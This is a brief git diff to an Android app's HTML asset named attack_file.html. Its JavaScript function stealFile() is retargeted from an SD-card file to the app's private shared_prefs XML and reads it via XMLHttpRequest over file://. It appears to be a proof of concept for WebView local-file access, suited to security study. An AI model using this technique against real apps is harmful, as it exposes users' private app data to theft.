--- a/app/src/main/assets/html/attack_file.html
+++ b/app/src/main/assets/html/attack_file.html
@@ -3,7 +3,7 @@
 <script>
 function stealFile()
 {
-	var file = "file:///mnt/sdcard/11.txt";
+	var file = "file:///data/data/com.example.jin.myapplication/shared_prefs/WebViewChromiumPrefs.xml";
 	var xmlHttpReq = new XMLHttpRequest();
 	xmlHttpReq.onreadystatechange = function(){
 		if(xmlHttpReq.readyState == 4){
